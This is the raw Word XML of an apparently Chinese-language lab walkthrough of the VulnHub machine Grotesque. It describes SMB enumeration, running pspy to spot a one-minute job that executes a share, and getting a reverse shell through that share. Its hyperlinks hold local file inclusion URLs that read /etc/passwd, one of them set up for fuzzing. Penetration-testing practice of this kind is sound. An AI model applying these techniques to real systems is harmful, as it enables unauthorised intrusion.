      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口这个是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务先收集一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDF193" w14:textId="1C287D85" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有密码，但是也找到了一个文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243B0CF" w14:textId="17FF3891" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3529DE0E" wp14:editId="18F52453">
            <wp:extent cx="5274310" cy="2545715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="78369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D38" w14:textId="6F3AE3D6" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问之后发现什么都没有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479B9CC" w14:textId="173552B7" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B2F87D" wp14:editId="488A184D">
            <wp:extent cx="5274310" cy="1505585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2002247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479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0C74" w14:textId="4BB16169" w:rsidR="00186CB4" w:rsidRDefault="00186CB4" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用简易web服务下载pspy</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64658F22" w14:textId="7A139E90" w:rsidR="002258BD" w:rsidRDefault="00186CB4" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00186CB4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB6E2D6" wp14:editId="08C46811">
            <wp:extent cx="5274310" cy="2259965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="123011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93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16D" w14:textId="52D1E271" w:rsidR="00186CB4" w:rsidRDefault="00824EEB" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00824EEB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E8FBEA" wp14:editId="3E1B23F4">
            <wp:extent cx="5274310" cy="1225550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1462278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78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744E" w14:textId="2737AE25" w:rsidR="00824EEB" w:rsidRDefault="00824EEB" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623CFE7C" w14:textId="0FAE5A4F" w:rsidR="00824EEB" w:rsidRDefault="00824EEB" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00824EEB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ECB3E6D" wp14:editId="346FC782">
            <wp:extent cx="5274310" cy="2950845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="108558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81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FD46" w14:textId="207D8A16" w:rsidR="00824EEB" w:rsidRDefault="00824EEB" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行就可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFCE67" w14:textId="7390CB52" w:rsidR="00824EEB" w:rsidRDefault="00A50638" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A50638">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D4FB35" wp14:editId="07505C60">
            <wp:extent cx="5274310" cy="2120900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1709758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84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6F8A" w14:textId="3C808A19" w:rsidR="00A50638" w:rsidRDefault="00A50638" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到/</w:t>
      </w:r>
      <w:r>
        <w:t>bin.sh -c /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbshare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里出现几次，且间隔是一分钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153FB67" w14:textId="286E1B02" w:rsidR="00A50638" w:rsidRDefault="00A50638" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用共享文件</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>夹反弹</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17F70D" w14:textId="6D2FF57A" w:rsidR="00A50638" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12339">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E93165" wp14:editId="3F1BAA7C">
            <wp:extent cx="5274310" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="89504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43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6EB" w14:textId="5282B640" w:rsidR="00A50638" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12339">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B96A903" wp14:editId="25947726">
            <wp:extent cx="5274310" cy="1129665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="201016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4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66F0" w14:textId="626CC19D" w:rsidR="00D12339" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72657F6D" w14:textId="591F84FD" w:rsidR="00D12339" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12339">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="293DB80D" wp14:editId="1328EFED">
            <wp:extent cx="5274310" cy="1186180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="198724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488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FA9D" w14:textId="5B35CC6C" w:rsidR="00D12339" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12339">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39F040CC" wp14:editId="50F2ABB9">
            <wp:extent cx="4671465" cy="670618"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58501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11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B7FF" w14:textId="5DAA20CA" w:rsidR="00D12339" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670522ED" w14:textId="77777777" w:rsidR="00D12339" w:rsidRPr="00746022" w:rsidRDefault="00D12339" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D12339" w:rsidRPr="007460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364"/>
    <w:rsid w:val="00087142"/>
    <w:rsid w:val="00186CB4"/>
    <w:rsid w:val="002258BD"/>
    <w:rsid w:val="00491364"/>
    <w:rsid w:val="005E166D"/>
    <w:rsid w:val="00746022"/>
    <w:rsid w:val="007530CF"/>
    <w:rsid w:val="00824EEB"/>
    <w:rsid w:val="00857411"/>
    <w:rsid w:val="009510B7"/>
    <w:rsid w:val="009D2E3C"/>
    <w:rsid w:val="009D7E35"/>
    <w:rsid w:val="00A34419"/>
    <w:rsid w:val="00A50638"/>
    <w:rsid w:val="00B75762"/>
    <w:rsid w:val="00BC2EAB"/>
    <w:rsid w:val="00BD39D8"/>
    <w:rsid w:val="00C6304A"/>
    <w:rsid w:val="00D12339"/>
    <w:rsid w:val="00E1408C"/>
    <w:rsid w:val="00F73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A7002"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD70431A-3819-4A29-B975-80DA443DE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408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1408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344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://192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd%20--hw%200" TargetMode="External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192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/etc/passwd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hyperlink" Target="http://192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/grotesque-301,723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11</Pages>
  <Words>232</Words>
  <Characters>1324</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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泽巍</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>泽巍 吴</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-01T02:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-17T06:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>